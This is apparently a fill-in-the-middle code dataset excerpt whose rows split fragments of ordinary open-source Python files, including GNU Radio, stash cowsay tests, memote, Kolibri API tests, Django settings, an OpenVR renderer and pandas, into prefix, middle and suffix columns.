prefix
stringlengths
0
918k
middle
stringlengths
0
812k
suffix
stringlengths
0
962k
from __future__ import unicode_literals # # Copyright 2004 Free Software Foundation, Inc. # # This file is part of GNU
Radio # # SPDX-License-Identifier: GPL-3.0-or-later # cl
ass NotDAG (Exception): """Not a directed acyclic graph""" pass class CantHappen (Exception): """Can't happen""" pass
# -*- coding: utf-8 -*- from stash.tests.stashtest import StashTestCase class CowsayTests(StashTestCase): """tests for cowsay""" def test_help(self): """test help output""" output = self.run_command("cowsay --help", exitcode=0) self.assertIn("cowsay", output) self.assertIn("--help", output) self.assertIn("usage:", output) def test_singleline_1(self): """test for correct text in output""" output = self.run_command("cowsay test", exitcode=0) self.assertIn("test", output) self.assertNotIn("Hello, World!", output) self.assertEqual(output.count("<"), 1) self.assertEqual(output.count(">"), 1) def test_singleline_1(self): """test for correct text in output""" output = self.run_command("cowsay Hello, World!", exitcode=0) self.assertIn("Hello, World!", output) self.assertNotIn("test", output) self.assertEqual(output.count("<"), 1) self.assertEqual(output.count(">"), 1) def test_stdin_read(self): """test 'echo test | cowsay' printing 'test'""" output = self.run_command("echo test | cowsay", exitcode=0) self.assertIn("test", output) self.assertNotIn("Hello, World!", output) def test_stdin_ignore(self): """test 'echo test | cowsay Hello, World!' printing 'Hello World!'""" output = self.run_command("echo test | cowsay Hello, World!", exitcode=0) self.assertIn("Hello, World!", output) self.assertNotIn("test", output) def test_multiline_1(self): """test for correct multiline output""" output = self.run_command("cowsay Hello,\\nWorld!", exitcode=0) self.assertIn("Hello,", output) self.assertIn("World!", output) self.assertNotIn("Hello,\nWorld!", output) # text should be splitted allong the lines self.assertIn("/", output) self.assertIn("\\", output) self.assertNotIn("<", output) self.assertNotIn(">", output) def test_multiline_2(self): """test for correct multiline output""" output = self.run_command("cowsay Hello,\\nWorld!\\nPython4Ever", exitcode=0) self.assertIn("Hello,", output) self.assertIn("World!", output) self.assertIn("Python4Ever", output) self.assertNotIn("Hello,\nWorld!\nPython4Ever", output) # text should be splitted allong the lines self.assertIn("/", out
put) self.assertIn("\\", output) self.assertIn("|", output)
self.assertNotIn("<", output) self.assertNotIn(">", output)
1) Initializes the voltage edges (self.edges) and probability mass in each bin (self.pv), 2) Creates an initial dictionary of inputs into the population, and 3) Resets the recorder that tracks firing rate during a simulation. This method is called by the Simulation object (initialization method), but can also be called by a user when defining an alternative time stepping loop. ''' self.initialize_edges() self.initialize_probability() # TODO: different initialization options if self.record == True: self.initialize_firing_rate_recorder() self.initialize_callback(self) def update(self): '''Update the population one time step. This method is called by the Simulation object to update the population one time step. In turn, this method: 1) Calls the update_total_input_dict method to gather the current strengths of presynaptic input populations, 2) Calls the update_propability_mass method to propagate self.pv one time-step, 3) Calls the update_firing_rate method to compute the firing rate of the population based on flux over threshold, and 4) Calls the update_firing_rate_recorder method to register the current firing rate with the recorder. ''' self.update_total_input_dict() self.update_propability_mass() self.update_firing_rate() if self.record == True: self.update_firing_rate_recorder() logger.debug('GID(%s) Firing rate: %3.2f' % (self.gid, self.curr_firing_rate)) self.update_callback(self) def initialize_edges(self): '''Initialize self.edges and self.leak_flux_matrix attributes. This method initializes the self.edges attribute based on the v_min, v_max, and dv settings, and creates a corresponding leak flux matrix based on this voltage discretization. ''' # Voltage edges and leak matrix construction self.tau_m = util.discretize_if_needed(self.tau_m) if np.sum(self.tau_m.xk <= 0) > 0: raise Exception('Negative tau_m values detected: %s' % self.tau_m.xk) # pragma: no cover # Voltage edges and leak matrix construction self.edges = util.get_v_edges(self.v_min, self.v_max, self.dv) # Different leak matrices for different solvers: self.leak_flux_matrix_dict = {} self.leak_flux_matrix_dict['dense'] = util.leak_matrix(self.edges, self.tau_m) # Backward Euler sparse: lfm_csrbe = sps.eye(np.shape(self.leak_flux_matrix_dict['dense'])[0], format='csr') - self.simulation.dt*self.leak_flux_matrix_dict['dense'] M_I, M_J = np.where(np.array(lfm_csrbe) != 0) M_val = lfm_csrbe[M_I, M_J] self.leak_flux_matrix_dict['sparse'] = (M_I, M_J, M_val) def initialize_probability(self): '''Initialize self.pv to delta-distribution at v=0.''' self.p0 = util.discretize_if_needed(self.p0) self.pv = util.get_pv_from_p0(self.p0, self.edges) util.assert_probability_mass_conserved(self.pv, 1e-15) def initialize_firing_rate_recorder(self): '''Initialize recorder at the beginning of a simulation. This method is typically called
by the initialize method rather than on its own. It resets the lists that track the firing rate during execution of the simulation. ''' # Set up firing rate recorder: if len(self.firing_rate_record) == 0: self.firing_rate_record.append(self.curr_firing_rate) if len(self.t_record) == 0: self.t_record.append(self.s
imulation.t) def initialize_total_input_dict(self): '''Initialize dictionary of presynaptic inputs at beginning of simulation This method is typically called by the initialize method rather than on its own. It creates a dictionary of synaptic inputs to the population. ''' # Aggregate input for each connection distribution: self.total_input_dict = {} for c in self.source_connection_list: try: curr_input = self.total_input_dict.setdefault(c.connection_distribution, 0) except: c.initialize_connection_distribution() curr_input = self.total_input_dict.setdefault(c.connection_distribution, 0) self.total_input_dict[c.connection_distribution] = curr_input + c.curr_delayed_firing_rate * c.nsyn def get_total_flux_matrix(self): '''Create a total flux matrix by summing presynaptic inputs and the leak matrix.''' total_flux_matrix = self.leak_flux_matrix_dict['dense'].copy() for key, val in self.total_input_dict.items(): try: total_flux_matrix += key.flux_matrix_dict['dense'] * val except: key.initialize() total_flux_matrix += key.flux_matrix_dict['dense'] * val return total_flux_matrix def update_total_input_dict(self): '''Update the input dictionary based on the current firing rates of presynaptic populations.''' # Initialize to zero: for curr_connection_distribution in self.total_input_dict.keys(): self.total_input_dict[curr_connection_distribution] = 0 for c in self.source_connection_list: self.total_input_dict[c.connection_distribution] += c.curr_delayed_firing_rate * c.nsyn def update_propability_mass(self): """Create a total flux matrix, and propogate self.pv one time-step.""" # import scipy.linalg as spla # import matplotlib.pyplot as plt # # if self.simulation.t > .09: # # for key, val in self.total_input_dict.items(): # print key, val # # evs = spla.eigvals(J*self.simulation.dt) # evs_re = np.real(evs) # evs_im = np.imag(evs) # plt.plot(evs_re, evs_im, '.') # plt.show() if self.update_method == 'exact': J = self.get_total_flux_matrix() self.pv = util.exact_update_method(J, self.pv, dt=self.simulation.dt) elif self.update_method == 'approx': J = self.get_total_flux_matrix() if self.approx_order == None: self.pv = util.approx_update_method_tol(J, self.pv, tol=self.tol, dt=self.simulation.dt, norm=self.norm) else: self.pv = util.approx_update_method_order(J, self.pv, approx_order=self.approx_order, dt=self.simulation.dt) elif self.update_method == 'gmres': self.update_propability_mass_backward_euler(lambda J, x0: spsla.gmres(J, x0, x0=x0, tol=self.tol)[0]) else: raise Exception('Unrecognized population update method: "%s"' % self.update_method) # pragma: no cover # Checking stability of if len(np.where(self.pv<0)[0]) != 0 or np.abs(np.abs(self.pv).sum() - 1) > 1e-15: self.pv[np.where(self.pv<0)] = 0 self.pv /= self.pv.sum() logger.critical('Normalizing Probability Mass') def update_propability_mass_backward_euler(self, solver): # Determine size of sparse array to construct total_size = len(self.leak_flux_matrix_dict['sparse'][0]) for key, val in self.total_input_dict.items(): try: total_size += len(key.flux_matrix_dict['sparse'][0]) except: key.initialize() total_size += len(key.flux_matrix_dict['sparse'][0]) M_I_total = np.empty(total_size) M_J_total = np.empty(total_size) M_val_total = np.empty(total_size) start_ind = 0 end_ind =
# -*- coding: utf-8 -*- # Copyright 2018 Novo Nordisk Foundation Center for Biosustainability, # Technical University of Denmark. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Provide an interface for growth experiments.""" from __future__ import absolute_import import logging from pandas import DataFrame from memote.experimental.experiment import Experiment __all__ = ("GrowthExperiment",) LOGGER = logging.getLogger(_
_name__) class GrowthExperiment(Experiment): """Represent a growth experiment.""" SCHEMA = "growth.json" def __init__(self, **kwargs): """ Initialize a growth experiment. Parameters ---------- kwargs """ super(GrowthExperiment, self).__init__(**kwargs) def load(self, dtype_conversion=None): """ Load the data table and corresponding validation schema. Parameters ------
---- dtype_conversion : dict Column names as keys and corresponding type for loading the data. Please take a look at the `pandas documentation <https://pandas.pydata.org/pandas-docs/stable/io.html#specifying-column-data-types>`__ for detailed explanations. """ if dtype_conversion is None: dtype_conversion = {"growth": str} super(GrowthExperiment, self).load(dtype_conversion=dtype_conversion) self.data["growth"] = self.data["growth"].isin(self.TRUTHY) def evaluate(self, model): """Evaluate in silico growth rates.""" with model: if self.medium is not None: self.medium.apply(model) if self.objective is not None: model.objective = self.objective model.add_cons_vars(self.constraints) growth = list() for row in self.data.itertuples(index=False): with model: exchange = model.reactions.get_by_id(row.exchange) if bool(exchange.reactants): exchange.lower_bound = -row.uptake else: exchange.upper_bound = row.uptake growth.append(model.slim_optimize() >= self.minimal_growth_rate) return DataFrame({"exchange": self.data["exchange"], "growth": growth})
# -*- coding: utf-8 -*- #!/usr/bin/python # Author:
Tania M. Molina # UY - 2017 # MIT License import math import numpy as np import pandas as pd from scipy import stats from scipy.stats import norm import scipy.
stats as stats import scipy.stats as st import matplotlib import matplotlib.pyplot as plt import re import scipy.stats import matplotlib.pyplot as mlab fhand = raw_input('Enter .csv file name or keyword: ') data = pd.read_csv(fhand, header=0) frame = pd.DataFrame(data)
import os import unittest import numpy as np from tfsnippet.examples.utils import MLResults from tfsnippet.utils import TemporaryDirectory def head_of_file(path, n): with open(path, 'rb') as f: return f.read(n) class MLResultTestCase(unittest.TestCase): def test_imwrite(self): with TemporaryDirectory() as tmpdir: results = MLResults(tmpdir) im = np.zeros([32, 32], dtype=np.uint8) im[16:, ...] = 255 results.save_image('test.bmp', im) file_path = os.path.join(tmpdir, 'test.bmp') self.assertTrue(os.path.isfile(file_path)) self.assertEqual(head_of_file(file_path, 2), b'\x42\x4d') results.save_image('test.png', im) file_path = os.path.join(tmpdir, 'test.png') self.assertTrue(os.path.isfile(file_path)) self.assertEqual(head_of_file(file_path, 8), b'\x89\x50\
x4e\x47\x0d\x0a\x1a\x0a') results.save_image('test.jpg', im) file_path = os.path.join(tmpdir, 'test.jpg') self.assertTrue(os.path.isfile(file_path)) self.assertEqual(head_of_file(file_path, 3), b'\xff\xd8\xf
f')
(self.admin) self.payload = {'user': self.user.pk, 'content_id': uuid.uuid4().hex, 'channel_id': uuid.uuid4().hex, 'kind': 'video', 'start_timestamp': str(datetime.datetime.now())} def test_contentsessionlog_list(self): self.client.login(username=self.admin.username, password=DUMMY_PASSWORD, facility=self.facility) response = self.client.get(reverse('contentsessionlog-list')) expected_count = ContentSessionLog.objects.count() self.assertEqual(len(response.data), expected_count) def test_contentsessionlog_detail(self): self.client.login(username=self.admin.username, password=DUMMY_PASSWORD, facility=self.facility) log_id = self.interaction_logs[0].id response = self.client.get(reverse('contentsessionlog-detail', kwargs={"pk": log_id})) log = ContentSessionLog.objects.get(pk=log_id) interaction_serializer = ContentSessionLogSerializer(log) self.assertEqual(response.data['content_id'], interaction_serializer.data['content_id']) def test_admin_can_create_contentsessionlog(self): self.client.login(username=self.admin.username, password=DUMMY_PASSWORD, facility=self.facility) response = self.client.post(reverse('contentsessionlog-list'), data=self.payload, format='json') self.assertEqual(response.status_code, status.HTTP_201_CREATED) def test_learner_can_create_contentsessionlog(self): self.client.login(username=self.user.username, password=DUMMY_PASSWORD, facility=self.facility) response = self.client.post(reverse('contentsessionlog-list'), data=self.payload, format='json') self.assertEqual(response.status_code, status.HTTP_201_CREATED) def test_anonymous_user_cannot_create_contentsessionlog_for_learner(self): response = self.client.post(reverse('contentsessionlog-list'), data=self.payload, format='json') self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN) def test_anonymous_user_can_create_contentsessionlog(self): del self.payload['user'] response = self.client.post(reverse('contentsessionlog-list'), data=self.payload, format='json') self.assertEqual(response.status_code, status.HTTP_201_CREATED) class ContentSummaryLogAPITestCase(APITestCase): def setUp(self): # create DeviceOwner to pass the setup_wizard middleware check DeviceOwner.objects.create(username='test-device-owner', password=123) self.facility = FacilityFactory.create() self.admin = FacilityUserFactory.create(facility=self.facility) self.user = FacilityUserFactory.create(facility=self.facility) self.summary_logs = [ContentSummaryLogFactory.create(user=self.user) for _ in range(3)] self.facility.add_admin(self.admin) self.payload = {'user': self.user.pk, 'content_id': uuid.uuid4().hex, 'channel_id': uuid.uuid4().hex, 'kind': "video", 'start_timestamp': str(datetime.datetime.now())} def test_summarylog_list(self): self.client.login(username=self.admin.username, password=DUMMY_PASSWORD, facility=self.facility) response = self.client.get(reverse('contentsummarylog-list')) expected_count = ContentSummaryLog.objects.count() self.assertEqual(len(response.data), expected_count) def test_summarylog_detail(self): self.client.login(username=self.admin.username, password=DUMMY_PASSWORD, facility=self.facility) log_id = self.summary_logs[0].id response = self.client.get(reverse('contentsummarylog-detail', kwargs={"pk": log_id})) log = ContentSummaryLog.objects.get(pk=log_id) summary_serializer = ContentSummaryLogSerializer(log) self.assertEqual(response.data['content_id'], summary_serializer.data['content_id']) def test_admin_can_create_summarylog(self): self.client.login(username=self.admin.username, password=DUMMY_PASSWORD, facility=self.facility) response = self.client.post(reverse('contentsummarylog-list'), data=self.payload, format='json') self.assertEqual(response.status_code, status.HTTP_201_CREATED) def test_learner_can_create_summarylog(self): self.client.login(username=self.user.username, password=DUMMY_PASSWORD, facility=self.facility) response = self.client.post(reverse('contentsummarylog-list'), data=self.payload, format='json') self.assertEqual(response.status_code, status.HTTP_201_CREATED) def test_anonymous_user_cannot_create_summarylog_for_learner(self): response = self.client.post(reverse('contentsummarylog-list'), data=self.payload, format='json') self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN) class ContentRatingLogAPITestCase(APITestCase): def setUp(self): # create DeviceOwner to pass the setup_wizard middleware check DeviceOwner.objects.create(username='test-device-owner', password=123) self.facility = FacilityFactory.create() self.admin = FacilityUserFactory.create(facility=self.facility) self.user = FacilityUserFactory.create(facility=self.facility) self.rating_logs = [ContentRatingLogFactory.create(user=self.user) for _ in range(3)] self.facility.add_admin(self.admin) self.payload = {'user': self.user.pk, 'content_id': uuid.uuid4().hex, 'channel_id': uuid.uuid4().hex} def test_ratinglog_list(self): self.client.login(username=self.admin.username, password=DUMMY_PASSWORD, facility=self.facility) response = self.client.get(reverse('contentratinglog-list')) expected_count = ContentRatingLog.objects.count() self.assertEqual(len(response.data), expected_count) def test_ratinglog_detail(self): self.client.login(username=self.admin.username, password=DUMMY_PASSWORD, facility=self.facility) log_id = self.rating_logs[0].id response = self.client.get(reverse('contentratinglog-detail', kwargs={"pk": log_id})) log = ContentRatingLog.objects.get(pk=log_id) rating_serializer = ContentRatingLogSerializer(log) self.assertEqual(response.data['content_id'], rating_serializer.data['content_id']) def test_admin_can_create_ratinglog(self): self.client.login(username=self.admin.username, password=DUMMY_PASSWORD, facility=self.facility) response = self.client.post(reverse('contentratinglog-list'), data=self.payload, format='json') self.assertEqual(respon
se.status_code, status.HTTP_201_CREATED) def test_learner_can_create_ratinglog(self): self.client.login(username=self.user.username, password=DUMMY_PASSWORD, facility=self.facility) response = self.client.post(rev
erse('contentratinglog-list'), data=self.payload, format='json') self.assertEqual(response.status_code, status.HTTP_201_CREATED) def test_anonymous_user_cannot_create_ratinglog_for_learner(self): response = self.client.post(reverse('contentratinglog-list'), data=self.payload, format='json') self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN) def test_anonymous_user_can_create_ratinglog(self): del self.payload['user'] response = self.client.post(reverse('contentratinglog-list'), data=self.payload, format='json') self.assertEqual(response.status_code, status.HTTP_201_CREATED) class UserSessionLogAPITestCase(APITestCase): def setUp(self): # create DeviceOwner to pass the setup_wizard middleware check DeviceOwner.objects.create(username='test-device-owner', password=123) self.facility = FacilityFactory.create() self.admin = FacilityUserFactory.create(facility=self.facility) self.user = FacilityUserFactory.create(facility=self.facility) self.session_logs = [UserSessionLogFactory.create(user=self.user) for _ in range(3)] self.facility.add_admin(self.admin) def test_sessionlog_l
project go here. LOCAL_APPS = ( 'users', # custom users app # Your stuff: custom apps go here ) # See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS INSTALLED_APPS += ( # Needs to come last for now because of a weird edge case between # South and allauth 'allauth', # registration 'allauth.account', # registration 'allauth.socialaccount', # registration ) # END APP CONFIGURATION # MIDDLEWARE CONFIGURATION MIDDLEWARE_CLASSES = ( 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ) # END MIDDLEWARE CONFIGURATION # DEBUG # See: https://docs.djangoproject.com/en/dev/ref/settings/#debug DEBUG = values.BooleanValue(False) # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug TEMPLATE_DEBUG = DEBUG # END DEBUG # SECRET CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key # Note: This key only used for development and testing. # In production, this is changed to a values.SecretValue() setting SECRET_KEY = "CHANGEME!!!" # END SECRET CONFIGURATION # FIXTURE CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS FIXTURE_DIRS = ( join(BASE_DIR, 'fixtures'), ) # END FIXTURE CONFIGURATION # EMAIL CONFIGURATION EMAIL_BACKEND = values.Value('django.core.mail.backends.smtp.EmailBackend') # END EMAIL CONFIGURATION # MANAGER CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#admins ADMINS = ( ('{{cookiecutter.author_name}}', '{{cookiecutter.email}}'), ) # See: https://docs.djangoproject.com/en/dev/ref/settings/#managers MANAGERS = ADMINS # END MANAGER CONFIGURATION # DATABASE CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#databases DATABASES = values.DatabaseURLValue('postgres://localhost/{{cookiecutter.repo_name}}') # END DATABASE CONFIGURATION # CACHING # Do this here because thanks to django-pylibmc-sasl and pylibmc memcacheify is painful to install on windows. # memcacheify is what's used in Production CACHES = { 'default': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', 'LOCATION': '' } } # END CACHING # GENERAL CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone TIME_ZONE = 'America/Los_Angeles' # See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code LANGUAGE_CODE = 'en-us' # See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id SITE_ID = 1 # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n USE_I18N = True # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n USE_L10N = True # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz USE_TZ = True # END GENERAL CONFIGURATION # TEMPLATE CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors TEMPLATE_CONTEXT_PROCESSORS = ( 'django.contrib.auth.context_processors.auth', "allauth.account.context_processors.account", "allauth.socialaccount.context_processors.socialaccount", 'django.core.context_processors.debug', 'django.core.context_processors.i18n', 'django.core.context_processors.media', 'django.core.context_processors.static', 'django.core.context_processors.tz', 'django.contrib.messages.context_processors.messages', 'django.core.context_processors.request', # Your stuff: custom template context processers go here ) # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs TEMPLATE_DIRS = (
join(BASE_DIR, 'templates'), ) TEMPLATE_LOADERS = ( 'django.template.loaders.filesystem.Loader', 'django.template.loaders.app_directories.Loader', ) # See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#tem
plate-packs CRISPY_TEMPLATE_PACK = 'bootstrap3' # END TEMPLATE CONFIGURATION # STATIC FILE CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root STATIC_ROOT = join(os.path.dirname(BASE_DIR), 'staticfiles') # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url STATIC_URL = '/static/' # See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS STATICFILES_DIRS = ( join(BASE_DIR, 'static'), ) # See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders STATICFILES_FINDERS = ( 'django.contrib.staticfiles.finders.FileSystemFinder', 'django.contrib.staticfiles.finders.AppDirectoriesFinder', ) # END STATIC FILE CONFIGURATION # MEDIA CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root MEDIA_ROOT = join(BASE_DIR, 'media') # See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url MEDIA_URL = '/media/' # END MEDIA CONFIGURATION # URL Configuration ROOT_URLCONF = 'config.urls' # See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application WSGI_APPLICATION = 'config.wsgi.application' # End URL Configuration # AUTHENTICATION CONFIGURATION AUTHENTICATION_BACKENDS = ( "django.contrib.auth.backends.ModelBackend", "allauth.account.auth_backends.AuthenticationBackend", ) # Some really nice defaults ACCOUNT_AUTHENTICATION_METHOD = "username" ACCOUNT_EMAIL_REQUIRED = True ACCOUNT_EMAIL_VERIFICATION = "mandatory" # END AUTHENTICATION CONFIGURATION # Custom user app defaults # Select the correct user model AUTH_USER_MODEL = "users.User" LOGIN_REDIRECT_URL = "users:redirect" LOGIN_URL = "account_login" # END Custom user app defaults # SLUGLIFIER AUTOSLUG_SLUGIFY_FUNCTION = "slugify.slugify" # END SLUGLIFIER # LOGGING CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#logging # A sample logging configuration. The only tangible logging # performed by this configuration is to send an email to # the site admins on every HTTP 500 error when DEBUG=False. # See http://docs.djangoproject.com/en/dev/topics/logging for # more details on how to customize your logging configuration. LOGGING = { 'version': 1, 'disable_existing_loggers': False, 'filters': { 'require_debug_false': { '()': 'django.utils.log.RequireDebugFalse' } }, 'handlers': { 'mail_admins': { 'level': 'ERROR', 'filters': ['require_debug_false'], 'class': 'django.utils.log.AdminEmailHandler' } }, 'loggers': { 'django.request': { 'handlers': ['mail_admins'], 'level': 'ERROR', 'propagate': True, }, } } # END LOGGING CONFIGURATION # CELERY CONFIGURATION # See: http://docs.celeryproject.org/en/latest/configuration.html#broker-transport BROKER_TRANSPORT = 'amqp' # See: http://docs.celeryproject.org/en/latest/configuration.html#broker-pool-limit # and https://groups.google.com/forum/#!topic/celery-users/JWnh2LFux9o BROKER_POOL_LIMIT = 4 # See: http://docs.celeryproject.org/en/latest/configuration.html#celery-redirect-stdouts-level CELERY_REDIRECT_STDOUTS_LEVEL = 'DEBUG' # See: http://docs.celeryproje
# Copyright (c) 2016 Mirantis Inc. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either
express or implied. See the # License for the specific language governing permissions and limitations # under the License. from alembic import context from rally.common.db import api from rally.common.db import models # add your model's MetaData object here # for 'autogenerate' support # from myapp import mymodel target_metadata = models.BASE.metadata # other values from
the config, defined by the needs of env.py, # can be acquired: # my_important_option = config.get_main_option("my_important_option") # ... etc. def run_migrations_online(): """Run migrations in 'online' mode. In this scenario we need to create an Engine and associate a connection with the context. """ engine = api.get_engine() with engine.connect() as connection: context.configure(connection=connection, render_as_batch=True, target_metadata=target_metadata) with context.begin_transaction(): context.run_migrations() run_migrations_online()
from ctypes import c_float, cast, POINTER import numpy as np import OpenGL.GL as gl import openvr from openvr.gl_renderer import OpenVrFramebuffer as OpenVRFramebuffer from openvr.gl_renderer import matrixForOpenVrMatrix as matrixForOpenVRMatrix from openvr.tracked_devices_actor import TrackedDevicesActor import gltfutils as gltfu c_float_p = POINTER(c_float) class OpenVRRenderer(object): def __init__(self, multisample=0, znear=0.1, zfar=1000): self.vr_system = openvr.init(openvr.VRApplication_Scene) w, h = self.vr_system.getRecommendedRenderTargetSize() self.vr_framebuffers = (OpenVRFramebuffer(w, h, multisample=multisample), OpenVRFramebuffer(w, h, multisample=multisample)) self.vr_compositor = openvr.VRCompositor() if self.vr_compositor is None: raise Exception('unable to create compositor') self.vr_framebuffers[0].init_gl() self.vr_framebuffers[1].init_gl() poses_t = openvr.TrackedDevicePose_t * openvr.k_unMaxTrackedDeviceCount self.poses = poses_t() self.projection_matrices = (np.asarray(matrixForOpenVRMatrix(self.vr_system.getProjectionMatrix(openvr.Eye_Left, znear, zfar))), np.asarray(matrixForOpenVRMatrix(self.vr_system.getProjectionMatrix(openvr.Eye_Right, znear, zfar)))) self.eye_transforms = (np.asarray(matrixForOpenVRMatrix(self.vr_system.getEyeToHeadTransform(openvr.Eye_Left)).I), np.asarray(matrixForOpenVRMatrix(self.vr_system.getEyeToHeadTransform(openvr.Eye_Right)).I)) self.view = np.eye(4, dtype=np.float32) self.view_matrices = (np.empty((4,4), dtype=np.float32), np.empty((4,4), dtype=np.float32)) self.controllers = TrackedDevicesActor(self.poses) self.controllers.show_controllers_only = False self.controllers.init_gl() self.vr_event = openvr.VREvent_t() def render(self, gltf, nodes, window_size=(800, 600)): self.vr_compositor.waitGetPoses(self.poses, openvr.k_unMaxTrackedDeviceCount, None, 0) hmd_pose = self.poses[openvr.k_unTrackedDeviceIndex_Hmd] if not hmd_pose.bPoseIsValid: return hmd_34 = np.ctypeslib.as_array(cast(hmd_pose.mDeviceToAbsoluteTracking.m, c_float_p), shape=(3,4)) self.view[:3,:] = hmd_34 view = np.linalg.inv(self.view.T) view.dot(self.eye_transforms[0], out=self.view_matrices[0]) view.dot(self.eye_transforms[1], out=self.view_matrices[1]) gl.glViewport(0, 0, self.vr_framebuffers[0].width, se
lf.vr_framebuffers[0].height) for eye in (0, 1): gl.glBindFramebuffer(gl.GL_FRAMEBUFFER, self.vr_framebuffers[eye].fb) gl.glClear(gl.GL_COLOR_BUFFER_BIT | gl.GL_DEPTH_BUFFER_BIT) gltfu.set_material_state.current_material = None gltfu.set_technique_state.current_technique = None for node in nodes: gltfu.draw_node(node, gltf, projection_matrix=self.p
rojection_matrices[eye], view_matrix=self.view_matrices[eye]) self.controllers.display_gl(self.view_matrices[eye], self.projection_matrices[eye]) self.vr_compositor.submit(openvr.Eye_Left, self.vr_framebuffers[0].texture) self.vr_compositor.submit(openvr.Eye_Right, self.vr_framebuffers[1].texture) # mirror left eye framebuffer to screen: gl.glBlitNamedFramebuffer(self.vr_framebuffers[0].fb, 0, 0, 0, self.vr_framebuffers[0].width, self.vr_framebuffers[0].height, 0, 0, window_size[0], window_size[1], gl.GL_COLOR_BUFFER_BIT, gl.GL_NEAREST) gl.glBindFramebuffer(gl.GL_FRAMEBUFFER, 0) def process_input(self): pass # state = self.vr_system.getControllerState(1) # if state and state.rAxis[1].x > 0.05: # self.vr_system.triggerHapticPulse(1, 0, int(3200 * state.rAxis[1].x)) # state = self.vr_system.getControllerState(2) # if state and state.rAxis[1].x > 0.05: # self.vr_system.triggerHapticPulse(2, 0, int(3200 * state.rAxis[1].x)) # if self.vr_system.pollNextEvent(self.vr_event): # if self.vr_event.eventType == openvr.VREvent_ButtonPress: # pass #print('vr controller button pressed') # elif self.vr_event.eventType == openvr.VREvent_ButtonUnpress: # pass #print('vr controller button unpressed') def shutdown(self): self.controllers.dispose_gl() openvr.shutdown()
ries(range(2), ... index=pd.DatetimeIndex(['2015-03-29 02:30:00', ... '2015-03-29 03:30:00'])) >>> s.tz_localize('Europe/Warsaw', nonexistent='shift_forward') 2015-03-29 03:00:00+02:00 0 2015-03-29 03:30:00+02:00 1 dtype: int64 >>> s.tz_localize('Europe/Warsaw', nonexistent='shift_backward') 2015-03-29 01:59:59.999999999+01:00 0 2015-03-29 03:30:00+02:00 1 dtype: int64 >>> s.tz_localize('Europe/Warsaw', nonexistent=pd.Timedelta('1H')) 2015-03-29 03:30:00+02:00 0 2015-03-29 03:30:00+02:00 1 dtype: int64 """ nonexistent_options = ("raise", "NaT", "shift_forward", "shift_backward") if nonexistent not in nonexistent_options and not isinstance( nonexistent, timedelta ): raise ValueError( "The nonexistent argument must be one of 'raise', " "'NaT', 'shift_forward', 'shift_backward' or " "a timedelta object" ) axis = self._get_axis_number(axis) ax = self._get_axis(axis) def _tz_localize(ax, tz, ambiguous, nonexistent): if not hasattr(ax, "tz_localize"): if len(ax) > 0: ax_name = self._get_axis_name(axis) raise TypeError( f"{ax_name} is not a valid DatetimeIndex or PeriodIndex" ) else: ax = DatetimeIndex([], tz=tz) else: ax = ax.tz_localize(tz, ambiguous=ambiguous, nonexistent=nonexistent) return ax # if a level is given it must be a MultiIndex level or # equivalent to the axis name if isinstance(ax, MultiIndex): level = ax._get_level_number(level) new_level = _tz_localize(ax.levels[level], tz, ambiguous, nonexistent) ax = ax.set_levels(new_level, level=level) else: if level not in (None, 0, ax.name): raise ValueError(f"The level {level} is not valid") ax = _tz_localize(ax, tz, ambiguous, nonexistent) result = self.copy(deep=copy) result = result.set_axis(ax, axis=axis, inplace=False) return result.__finalize__(self, method="tz_localize") # ---------------------------------------------------------------------- # Numeric Methods @final def abs(self: FrameOrSeries) -> FrameOrSeries: """ Return a Series/DataFrame with absolute numeric value of each element. This function only applies to elements that are all numeric. Returns ------- abs Series/DataFrame containing the absolute value of each element. See Also -------- numpy.absolute : Calculate the absolute value element-wise. Notes ----- For ``complex`` inputs, ``1.2 + 1j``, the absolute value is :math:`\\sqrt{ a^2 + b^2 }`. Examples -------- Absolute 